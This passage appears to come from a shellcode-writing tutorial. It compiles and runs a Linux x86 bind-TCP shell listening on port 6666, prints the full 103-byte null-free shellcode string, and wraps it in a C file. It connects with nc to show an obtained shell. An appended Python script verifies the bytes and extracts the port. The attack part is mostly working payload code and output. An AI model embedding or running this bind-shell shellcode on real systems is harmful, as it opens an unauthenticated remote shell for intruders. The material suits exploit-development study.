Let's run the newly compiled assembly binary to confirm it works, then convert it to shellcode and wrap it in a C file.
ASM
$ ./bind_tcp_initial_nonull &
[1] 2533
$ nc localhost 6666
id
uid=1000(vbox) gid=1000(vbox) groups=1000(vbox),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
C
Converting to shellcode and compiling
$ cp ../sc_template_c.c bind_tcp_initial_nonull-c.c
$ ../convert_bin_sc.sh bind_tcp_initial_nonull
"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x92\x56\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x52\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x56\x56\x52\x89\xe1\xcd\x80\x92\xb0\x3f\x87\xda\x89\xf1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x0b\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xf1\x87\xd6\xcd\x80"
$ vim bind_tcp_initial_nonull-c.c
$ ../compile_c.sh bind_tcp_initial_nonull-c
[+] Compiling ...
[+] Done!
Running the compiled C file
Running the file, we see that the shellcode is 103 bytes long.
$ ./bind_tcp_initial_nonull-c &
[1] 2583
$ Shellcode Length: 103
$ nc localhost 6666
id
uid=1000(vbox) gid=1000(vbox) groups=1000(vbox),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
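As an added check (not part of the original post or its helper scripts), the following Python snippet decodes the C-escaped string produced by the conversion step, confirms the 103-byte length, verifies that no null bytes are present (a null would make the C template's strlen() report a truncated length and stop execution early), counts the int 0x80 syscalls, and reads the bind port out of the push-word immediate. The port lookup is a heuristic I assume for this listing, not something the conversion script does.

```python
import re

# C-escaped bytes exactly as printed by convert_bin_sc.sh above (copied from the page).
SHELLCODE_STR = (
    r"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
    r"\x92\x56\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x52\x89\xe1\xcd\x80"
    r"\xb0\x66\xb3\x04\x56\x52\x89\xe1\xcd\x80"
    r"\xb0\x66\xb3\x05\x56\x56\x52\x89\xe1\xcd\x80"
    r"\x92\xb0\x3f\x87\xda\x89\xf1\xcd\x80"
    r"\xb0\x3f\xfe\xc1\xcd\x80"
    r"\xb0\x3f\xfe\xc1\xcd\x80"
    r"\xb0\x0b\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xf1\x87\xd6\xcd\x80"
)


def decode_c_escapes(s: str) -> bytes:
    """Turn the body of a "\\x6a\\x66..." C string literal into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", s))


def c_strlen(code: bytes) -> int:
    """Length as the C template's strlen() would see it: stops at the first null."""
    idx = code.find(b"\x00")
    return len(code) if idx < 0 else idx


def inspect(s: str) -> dict:
    """Summarise a decoded shellcode string for review."""
    code = decode_c_escapes(s)
    null_offsets = [i for i, b in enumerate(code) if b == 0]
    # int 0x80 is encoded as cd 80; non-overlapping count is enough here.
    int80_count = code.count(b"\xcd\x80")
    # Heuristic (assumption): the first 'push imm16' (66 68 lo hi) holds the
    # listening port in network byte order, as it does in this listing.
    idx = code.find(b"\x66\x68")
    port = int.from_bytes(code[idx + 2:idx + 4], "big") if 0 <= idx and idx + 4 <= len(code) else None
    return {
        "length": len(code),
        "strlen_length": c_strlen(code),
        "null_offsets": null_offsets,
        "int80_count": int80_count,
        "port": port,
    }


if __name__ == "__main__":
    print(inspect(SHELLCODE_STR))
```

The two length fields only agree when the string is null-free, which is exactly the property the "nonull" variant is meant to guarantee.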